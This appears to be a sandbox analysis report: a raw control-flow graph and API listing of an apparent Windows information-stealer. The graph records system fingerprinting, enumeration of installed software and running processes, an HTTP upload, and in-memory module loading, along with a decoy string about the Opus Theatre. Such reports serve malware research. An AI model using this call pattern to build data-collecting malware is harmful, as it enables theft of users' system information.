78a8a0 lstrcpy 78799->78800 78801 781d2d 78800->78801 78802 78a9b0 4 API calls 78801->78802 78803 781d4c 78802->78803 78804 78a8a0 lstrcpy 78803->78804 78805 781d55 78804->78805 78806 78a9b0 4 API calls 78805->78806 78807 781d75 78806->78807 78808 78a8a0 lstrcpy 78807->78808 78809 781d7e 78808->78809 78810 7878e0 3 API calls 78809->78810 78811 781d8e 78810->78811 78812 78a9b0 4 API calls 78811->78812 78813 781d9e 78812->78813 78814 78a8a0 lstrcpy 78813->78814 78815 781da7 78814->78815 78816 78a9b0 4 API calls 78815->78816 78817 781dc6 78816->78817 78818 78a8a0 lstrcpy 78817->78818 78819 781dcf 78818->78819 78820 78a9b0 4 API calls 78819->78820 78821 781df0 78820->78821 78822 78a8a0 lstrcpy 78821->78822 78823 781df9 78822->78823 79411 787980 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 78823->79411 78826 78a9b0 4 API calls 78827 781e19 78826->78827 78828 78a8a0 lstrcpy 78827->78828 78829 781e22 78828->78829 78830 78a9b0 4 API calls 78829->78830 78831 781e41 78830->78831 78832 78a8a0 lstrcpy 78831->78832 78833 781e4a 78832->78833 78834 78a9b0 4 API calls 78833->78834 78835 781e6b 78834->78835 78836 78a8a0 lstrcpy 78835->78836 78837 781e74 78836->78837 79413 787a30 GetProcessHeap HeapAlloc GetTimeZoneInformation 78837->79413 78840 78a9b0 4 API calls 78841 781e94 78840->78841 78842 78a8a0 lstrcpy 78841->78842 78843 781e9d 78842->78843 78844 78a9b0 4 API calls 78843->78844 78845 781ebc 78844->78845 78846 78a8a0 lstrcpy 78845->78846 78847 781ec5 78846->78847 78848 78a9b0 4 API calls 78847->78848 78849 781ee5 78848->78849 78850 78a8a0 lstrcpy 78849->78850 78851 781eee 78850->78851 79416 787b00 GetUserDefaultLocaleName 78851->79416 78854 78a9b0 4 API calls 78855 781f0e 78854->78855 78856 78a8a0 lstrcpy 78855->78856 78857 781f17 78856->78857 78858 78a9b0 4 API calls 78857->78858 78859 781f36 78858->78859 78860 78a8a0 lstrcpy 78859->78860 78861 781f3f 78860->78861 78862 78a9b0 4 API calls 78861->78862 78863 781f60 78862->78863 78864 78a8a0 lstrcpy 78863->78864 78865 781f69 78864->78865 79421 787b90 78865->79421 78867 781f80 78868 78a920 3 API calls 78867->78868 78869 781f93 78868->78869 78870 78a8a0 lstrcpy 78869->78870 78871 781f9c 78870->78871 78872 78a9b0 4 API calls 78871->78872 78873 781fc6 78872->78873 78874 78a8a0 lstrcpy 78873->78874 78875 781fcf 78874->78875 78876 78a9b0 4 API calls 78875->78876 78877 781fef 78876->78877 78878 78a8a0 lstrcpy 78877->78878 78879 781ff8 78878->78879 79433 787d80 GetSystemPowerStatus 78879->79433 78882 78a9b0 4 API calls 78883 782018 78882->78883 78884 78a8a0 lstrcpy 78883->78884 78885 782021 78884->78885 78886 78a9b0 4 API calls 78885->78886 78887 782040 78886->78887 78888 78a8a0 lstrcpy 78887->78888 78889 782049 78888->78889 78890 78a9b0 4 API calls 78889->78890 78891 78206a 78890->78891 78892 78a8a0 lstrcpy 78891->78892 78893 782073 78892->78893 78894 78207e GetCurrentProcessId 78893->78894 79435 789470 OpenProcess 78894->79435 78897 78a920 3 API calls 78898 7820a4 78897->78898 78899 78a8a0 lstrcpy 78898->78899 78900 7820ad 78899->78900 78901 78a9b0 4 API calls 78900->78901 78902 7820d7 78901->78902 78903 78a8a0 lstrcpy 78902->78903 78904 7820e0 78903->78904 78905 78a9b0 4 API calls 78904->78905 78906 782100 78905->78906 78907 78a8a0 lstrcpy 78906->78907 78908 782109 78907->78908 79440 787e00 GetProcessHeap HeapAlloc RegOpenKeyExA 78908->79440 78911 78a9b0 4 API calls 78912 782129 78911->78912 78913 78a8a0 lstrcpy 78912->78913 78914 782132 78913->78914 78915 78a9b0 4 API calls 78914->78915 78916 782151 78915->78916 78917 78a8a0 lstrcpy 78916->78917 78918 78215a 78917->78918 78919 78a9b0 4 API calls 78918->78919 78920 78217b 78919->78920 78921 78a8a0 lstrcpy 78920->78921 78922 782184 78921->78922 79444 787f60 78922->79444 78925 78a9b0 4 API calls 78926 7821a4 78925->78926 78927 78a8a0 lstrcpy 78926->78927 78928 7821ad 78927->78928 78929 78a9b0 4 API calls 78928->78929 78930 7821cc 78929->78930 78931 78a8a0 lstrcpy 78930->78931 78932 7821d5 78931->78932 78933 78a9b0 4 API calls 78932->78933 78934 7821f6 78933->78934 78935 78a8a0 lstrcpy 78934->78935 78936 7821ff 78935->78936 79459 787ed0 GetSystemInfo wsprintfA 78936->79459 78939 78a9b0 4 API calls 78940 78221f 78939->78940 78941 78a8a0 lstrcpy 78940->78941 78942 782228 78941->78942 78943 78a9b0 4 API calls 78942->78943 78944 782247 78943->78944 78945 78a8a0 lstrcpy 78944->78945 78946 782250 78945->78946 78947 78a9b0 4 API calls 78946->78947 78948 782270 78947->78948 78949 78a8a0 lstrcpy 78948->78949 78950 782279 78949->78950 79461 788100 GetProcessHeap HeapAlloc 78950->79461 78953 78a9b0 4 API calls 78954 782299 78953->78954 78955 78a8a0 lstrcpy 78954->78955 78956 7822a2 78955->78956 78957 78a9b0 4 API calls 78956->78957 78958 7822c1 78957->78958 78959 78a8a0 lstrcpy 78958->78959 78960 7822ca 78959->78960 78961 78a9b0 4 API calls 78960->78961 78962 7822eb 78961->78962 78963 78a8a0 lstrcpy 78962->78963 78964 7822f4 78963->78964 79467 7887c0 78964->79467 78967 78a920 3 API calls 78968 78231e 78967->78968 78969 78a8a0 lstrcpy 78968->78969 78970 782327 78969->78970 78971 78a9b0 4 API calls 78970->78971 78972 782351 78971->78972 78973 78a8a0 lstrcpy 78972->78973 78974 78235a 78973->78974 78975 78a9b0 4 API calls 78974->78975 78976 78237a 78975->78976 78977 78a8a0 lstrcpy 78976->78977 78978 782383 78977->78978 78979 78a9b0 4 API calls 78978->78979 78980 7823a2 78979->78980 78981 78a8a0 lstrcpy 78980->78981 78982 7823ab 78981->78982 79472 7881f0 78982->79472 78984 7823c2 78985 78a920 3 API calls 78984->78985 78986 7823d5 78985->78986 78987 78a8a0 lstrcpy 78986->78987 78988 7823de 78987->78988 78989 78a9b0 4 API calls 78988->78989 78990 78240a 78989->78990 78991 78a8a0 lstrcpy 78990->78991 78992 782413 78991->78992 78993 78a9b0 4 API calls 78992->78993 78994 782432 78993->78994 78995 78a8a0 lstrcpy 78994->78995 78996 78243b 78995->78996 78997 78a9b0 4 API calls 78996->78997 78998 78245c 78997->78998 78999 78a8a0 lstrcpy 78998->78999 79000 782465 78999->79000 79001 78a9b0 4 API calls 79000->79001 79002 782484 79001->79002 79003 78a8a0 lstrcpy 79002->79003 79004 78248d 79003->79004 79005 78a9b0 4 API calls 79004->79005 79006 7824ae 79005->79006 79007 78a8a0 lstrcpy 79006->79007 79008 7824b7 79007->79008 79480 788320 79008->79480 79010 7824d3 79011 78a920 3 API calls 79010->79011 79012 7824e6 79011->79012 79013 78a8a0 lstrcpy 79012->79013 79014 7824ef 79013->79014 79015 78a9b0 4 API calls 79014->79015 79016 782519 79015->79016 79017 78a8a0 lstrcpy 79016->79017 79018 782522 79017->79018 79019 78a9b0 4 API calls 79018->79019 79020 782543 79019->79020 79021 78a8a0 lstrcpy 79020->79021 79022 78254c 79021->79022 79023 788320 17 API calls 79022->79023 79024 782568 79023->79024 79025 78a920 3 API calls 79024->79025 79026 78257b 79025->79026 79027 78a8a0 lstrcpy 79026->79027 79028 782584 79027->79028 79029 78a9b0 4 API calls 79028->79029 79030 7825ae 79029->79030 79031 78a8a0 lstrcpy 79030->79031 79032 7825b7 79031->79032 79033 78a9b0 4 API calls 79032->79033 79034 7825d6 79033->79034 79035 78a8a0 lstrcpy 79034->79035 79036 7825df 79035->79036 79037 78a9b0 4 API calls 79036->79037 79038 782600 79037->79038 79039 78a8a0 lstrcpy 79038->79039 79040 782609 79039->79040 79516 788680 79040->79516 79042 782620 79043 78a920 3 API calls 79042->79043 79044 782633 79043->79044 79045 78a8a0 lstrcpy 79044->79045 79046 78263c 79045->79046 79047 78265a lstrlenA 79046->79047 79048 78266a 79047->79048 79049 78a740 lstrcpy 79048->79049 79050 78267c 79049->79050 79051 771590 lstrcpy 79050->79051 79052 78268d 79051->79052 79526 785190 79052->79526 79054 782699 79054->77471 79721 78aad0 79055->79721 79057 775009 InternetOpenUrlA 79060 775021 79057->79060 79058 7750a0 InternetCloseHandle InternetCloseHandle 79061 7750ec 79058->79061 79059 77502a InternetReadFile 79059->79060 79060->79058 79060->79059 79062 775070 memcpy 79060->79062 79061->77475 79062->79060 79722 7798d0 79063->79722 79065 780759 79066 780a38 79065->79066 79067 78077d 79065->79067 79068 771590 lstrcpy 79066->79068 79070 780799 StrCmpCA 79067->79070 79069 780a49 79068->79069 79898 780250 79069->79898 79072 7807a8 79070->79072 79098 780843 79070->79098 79073 78a7a0 lstrcpy 79072->79073 79075 7807c3 79073->79075 79077 771590 lstrcpy 79075->79077 79076 780865 StrCmpCA 79078 780874 79076->79078 79115 78096b 79076->79115 79079 78080c 79077->79079 79080 78a740 lstrcpy 79078->79080 79081 78a7a0 lstrcpy 79079->79081 79083 780881 79080->79083 79085 780823 79081->79085 79082 78099c StrCmpCA 79086 7809ab 79082->79086 79104 780a2d 79082->79104 79084 78a9b0 4 API calls 79083->79084 79087 7808ac 79084->79087 79088 78a7a0 lstrcpy 79085->79088 79089 771590 lstrcpy 79086->79089 79091 78a920 3 API calls 79087->79091 79090 7809f4 79089->79090 79093 78a7a0 lstrcpy 79090->79093 79098->79076 79104->77479 79115->79082 79352 78a7a0 lstrcpy 79351->79352 79353 771683 79352->79353 79354 78a7a0 lstrcpy 79353->79354 79355 771695 79354->79355 79356 78a7a0 lstrcpy 79355->79356 79357 7716a7 79356->79357 79358 78a7a0 lstrcpy 79357->79358 79359 7715a3 79358->79359 79359->78302 79388 771030 79360->79388 79364 774838 lstrlenA 79391 78aad0 79364->79391 79366 774848 InternetCrackUrlA 79367 774867 79366->79367 79367->78379 79369 78a740 lstrcpy 79368->79369 79370 788b74 79369->79370 79371 78a740 lstrcpy 79370->79371 79372 788b82 GetSystemTime 79371->79372 79373 788b99 79372->79373 79374 78a7a0 lstrcpy 79373->79374 79375 788bfc 79374->79375 79375->78394 79377 78a931 79376->79377 79378 78a988 79377->79378 79380 78a968 lstrcpy lstrcatA 79377->79380 79379 78a7a0 lstrcpy 79378->79379 79381 78a994 79379->79381 79380->79378 79381->78398 79382->78512 79384 774eee 79383->79384 79385 779af9 LocalAlloc 79383->79385 79384->78400 79384->78403 79385->79384 79386 779b14 CryptStringToBinaryA 79385->79386 79386->79384 79387 779b39 LocalFree 79386->79387 79387->79384 79389 77103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 79388->79389 79390 78aad0 79389->79390 79390->79364 79391->79366 79392->78522 79393->78667 79394->78669 79395->78671 79396->78673 79397->78677 79398->78679 79399->78688 79400->78695 79401->78705 79533 7877a0 79402->79533 79405 781c1e 79405->78770 79406 7876c6 RegOpenKeyExA 79407 787704 RegCloseKey 79406->79407 79408 7876e7 RegQueryValueExA 79406->79408 79407->79405 79408->79407 79410 781c99 79409->79410 79410->78784 79412 781e09 79411->79412 79412->78826 79414 787a9a wsprintfA 79413->79414 79415 781e84 79413->79415 79414->79415 79415->78840 79417 787b4d 79416->79417 79418 781efe 79416->79418 79540 788d20 LocalAlloc CharToOemW 79417->79540 79418->78854 79420 787b59 79420->79418 79422 78a740 lstrcpy 79421->79422 79423 787bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 79422->79423 79430 787c25 79423->79430 79424 787d18 79426 787d28 79424->79426 79427 787d1e LocalFree 79424->79427 79425 787c46 GetLocaleInfoA 79425->79430 79428 78a7a0 lstrcpy 79426->79428 79427->79426 79432 787d37 79428->79432 79429 78a9b0 lstrcpy lstrlenA lstrcpy lstrcatA 79429->79430 79430->79424 79430->79425 79430->79429 79431 78a8a0 lstrcpy 79430->79431 79431->79430 79432->78867 79434 782008 79433->79434 79434->78882 79436 789493 K32GetModuleFileNameExA CloseHandle 79435->79436 79437 7894b5 79435->79437 79436->79437 79438 78a740 lstrcpy 79437->79438 79439 782091 79438->79439 79439->78897 79441 787e68 RegQueryValueExA 79440->79441 79442 782119 79440->79442 79443 787e8e RegCloseKey 79441->79443 79442->78911 79443->79442 79445 787fb9 GetLogicalProcessorInformationEx 79444->79445 79446 787fd8 GetLastError 79445->79446 79452 788029 79445->79452 79447 787fe3 79446->79447 79451 788022 79446->79451 79458 787fec 79447->79458 79450 782194 79450->78925 79451->79450 79544 7889f0 GetProcessHeap HeapFree 79451->79544 79543 7889f0 GetProcessHeap HeapFree 79452->79543 79455 78807b 79455->79451 79457 788084 wsprintfA 79455->79457 79456 788016 79456->79450 79457->79450 79458->79445 79458->79456 79541 7889f0 GetProcessHeap HeapFree 79458->79541 79542 788a10 GetProcessHeap HeapAlloc 79458->79542 79460 78220f 79459->79460 79460->78939 79462 7889b0 79461->79462 79463 78814d GlobalMemoryStatusEx 79462->79463 79464 788163 __aulldiv 79463->79464 79465 78819b wsprintfA 79464->79465 79466 782289 79465->79466 79466->78953 79468 7887fb GetProcessHeap HeapAlloc wsprintfA 79467->79468 79470 78a740 lstrcpy 79468->79470 79471 78230b 79470->79471 79471->78967 79473 78a740 lstrcpy 79472->79473 79479 788229 79473->79479 79474 788263 79476 78a7a0 lstrcpy 79474->79476 79475 78a9b0 lstrcpy lstrlenA lstrcpy lstrcatA 79475->79479 79477 7882dc 79476->79477 79477->78984 79478 78a8a0 lstrcpy 79478->79479 79479->79474 79479->79475 79479->79478 79481 78a740 lstrcpy 79480->79481 79482 78835c RegOpenKeyExA 79481->79482 79483 7883ae 79482->79483 79484 7883d0 79482->79484 79485 78a7a0 lstrcpy 79483->79485 79486 7883f8 RegEnumKeyExA 79484->79486 79487 788613 RegCloseKey 79484->79487 79496 7883bd 79485->79496 79489 78860e 79486->79489 79490 78843f wsprintfA RegOpenKeyExA 79486->79490 79488 78a7a0 lstrcpy 79487->79488 79488->79496 79489->79487 79491 7884c1 RegQueryValueExA 79490->79491 79492 788485 RegCloseKey RegCloseKey 79490->79492 79494 7884fa lstrlenA 79491->79494 79495 788601 RegCloseKey 79491->79495 79493 78a7a0 lstrcpy 79492->79493 79493->79496 79494->79495 79497 788510 79494->79497 79495->79489 79496->79010 79498 78a9b0 4 API calls 79497->79498 79499 788527 79498->79499 79500 78a8a0 lstrcpy 79499->79500 79501 788533 79500->79501 79502 78a9b0 4 API calls 79501->79502 79503 788557 79502->79503 79504 78a8a0 lstrcpy 79503->79504 79505 788563 79504->79505 79506 78856e RegQueryValueExA 79505->79506 79506->79495 79507 7885a3 79506->79507 79508 78a9b0 4 API calls 79507->79508 79509 7885ba 79508->79509 79510 78a8a0 lstrcpy 79509->79510 79511 7885c6 79510->79511 79512 78a9b0 4 API calls 79511->79512 79513 7885ea 79512->79513 79514 78a8a0 lstrcpy 79513->79514 79515 7885f6 79514->79515 79515->79495 79517 78a740 lstrcpy 79516->79517 79518 7886bc CreateToolhelp32Snapshot Process32First 79517->79518 79519 7886e8 Process32Next 79518->79519 79520 78875d CloseHandle 79518->79520 79519->79520 79523 7886fd 79519->79523 79521 78a7a0 lstrcpy 79520->79521 79522 788776 79521->79522 79522->79042 79523->79519 79524 78a9b0 lstrcpy lstrlenA lstrcpy lstrcatA 79523->79524 79525 78a8a0 lstrcpy 79523->79525 79524->79523 79525->79523 79527 78a7a0 lstrcpy 79526->79527 79528 7851b5 79527->79528 79529 771590 lstrcpy 79528->79529 79530 7851c6 79529->79530 79545 775100 79530->79545 79532 7851cf 79532->79054 79536 787720 GetProcessHeap HeapAlloc RegOpenKeyExA 79533->79536 79535 7876b9 79535->79405 79535->79406 79537 787780 RegCloseKey 79536->79537 79538 787765 RegQueryValueExA 79536->79538 79539 787793 79537->79539 79538->79537 79539->79535 79540->79420 79541->79458 79542->79458 79543->79455 79544->79450 79546 78a7a0 lstrcpy 79545->79546 79547 775119 79546->79547 79548 7747b0 5 API calls 79547->79548 79549 775125 79548->79549 79707 788ea0 79549->79707 79551 775184 79552 775192 lstrlenA 79551->79552 79553 7751a5 79552->79553 79554 788ea0 4 API calls 79553->79554 79555 7751b6 79554->79555 79556 78a740 lstrcpy 79555->79556 79557 7751c9 79556->79557 79558 78a740 lstrcpy 79557->79558 79559 7751d6 79558->79559 79560 78a740 lstrcpy 79559->79560 79561 7751e3 79560->79561 79562 78a740 lstrcpy 79561->79562 79563 7751f0 79562->79563 79564 78a740 lstrcpy 79563->79564 79565 7751fd InternetOpenA StrCmpCA 79564->79565 79566 77522f 79565->79566 79567 7758c4 InternetCloseHandle 79566->79567 79568 788b60 3 API calls 79566->79568 79574 7758d9 ctype 79567->79574 79569 77524e 79568->79569 79570 78a920 3 API calls 79569->79570 79571 775261 79570->79571 79572 78a8a0 lstrcpy 79571->79572 79573 77526a 79572->79573 79575 78a9b0 4 API calls 79573->79575 79578 78a7a0 lstrcpy 79574->79578 79576 7752ab 79575->79576 79577 78a920 3 API calls 79576->79577 79579 7752b2 79577->79579 79585 775913 79578->79585 79580 78a9b0 4 API calls 79579->79580 79581 7752b9 79580->79581 79582 78a8a0 lstrcpy 79581->79582 79583 7752c2 79582->79583 79584 78a9b0 4 API calls 79583->79584 79586 775303 79584->79586 79585->79532 79587 78a920 3 API calls 79586->79587 79588 77530a 79587->79588 79589 78a8a0 lstrcpy 79588->79589 79590 775313 79589->79590 79591 775329 InternetConnectA 79590->79591 79591->79567 79592 775359 HttpOpenRequestA 79591->79592 79594 7758b7 InternetCloseHandle 79592->79594 79595 7753b7 79592->79595 79594->79567 79596 78a9b0 4 API calls 79595->79596 79597 7753cb 79596->79597 79598 78a8a0 lstrcpy 79597->79598 79599 7753d4 79598->79599 79600 78a920 3 API calls 79599->79600 79601 7753f2 79600->79601 79602 78a8a0 lstrcpy 79601->79602 79603 7753fb 79602->79603 79604 78a9b0 4 API calls 79603->79604 79605 77541a 79604->79605 79606 78a8a0 lstrcpy 79605->79606 79607 775423 79606->79607 79608 78a9b0 4 API calls 79607->79608 79609 775444 79608->79609 79708 788ea9 79707->79708 79709 788ead CryptBinaryToStringA 79707->79709 79708->79551 79709->79708 79710 788ece GetProcessHeap HeapAlloc 79709->79710 79711 788ef0 79710->79711 79712 788ef4 ctype 79710->79712 79711->79708 79713 788f05 CryptBinaryToStringA 79712->79713 79713->79711 79721->79057 79973 779880 ??2@YAPAXI 79722->79973 79724 7798e1 79724->79065 79899 78a740 lstrcpy 79898->79899 79900 780266 79899->79900 79901 788de0 2 API calls 79900->79901 79902 78027b 79901->79902 79903 78a920 3 API calls 79902->79903 79904 78028b 79903->79904 79976 776fb0 79973->79976 79975 7798ad ctype 79975->79724 79979 776d40 79976->79979 79980 776d63 79979->79980 79996 776d59 79979->79996 79997 776530 79980->79997 79984 776dbe 79984->79996 80009 7769b0 79984->80009 79988 776e4a 79988->79996 79996->79975 79999 776542 79997->79999 79998 776549 79998->79996 80003 776660 79998->80003 79999->79998 80000 7765ce 79999->80000 80028 788a10 GetProcessHeap HeapAlloc 80000->80028 80002 7765f0 80002->79998 80006 77668f VirtualAlloc 80003->80006 80005 776730 80007 776743 VirtualAlloc 80005->80007 80008 77673c 80005->80008 80006->80005 80006->80008 80007->80008 80008->79984 80010 7769d5 80009->80010 80011 7769c9 80009->80011 80010->79996 80022 776be0 80010->80022 80011->80010 80012 776a09 LoadLibraryA 80011->80012 80013 776a28 80012->80013 80015 776a32 80012->80015 80013->80010 80014 776ae0 80014->80013 80018 776ba8 GetProcAddress 80014->80018 80015->80014 80029 788a10 GetProcessHeap HeapAlloc 80015->80029 80017 776a8b 80017->80013 80019 776ad1 80017->80019 80018->80013 80018->80014 80024 776bfb 80022->80024 80023 776ca9 80023->79988 80024->80023 80025 776c80 VirtualProtect 80024->80025 80025->80023 80025->80024 80028->80002 80029->80017

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745CC
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745D7
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745E2
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745ED
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745F8
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,007869FB), ref: 00774607
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,007869FB), ref: 0077460E
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077461C
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774627
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774632
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077463D
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774648
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077465C
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774667
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774672
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077467D
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774688
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746B1
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746BC
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746C7
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746D2
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746DD
                                                                                                                                                                            • strlen.MSVCRT ref: 007746F0
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774718
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774723
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0077472E
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774739
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774744
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774754
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0077475F
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0077476A
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774775
                                                                                                                                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774780
                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0077479C
                                                                                                                                                                            Strings
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077473F
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745C7
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774657
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746AC
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745E8
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774729
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774770
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774638
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774622
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774683
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077466D
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746C2
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746CD
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774713
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077477B
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745DD
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746D8
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745D2
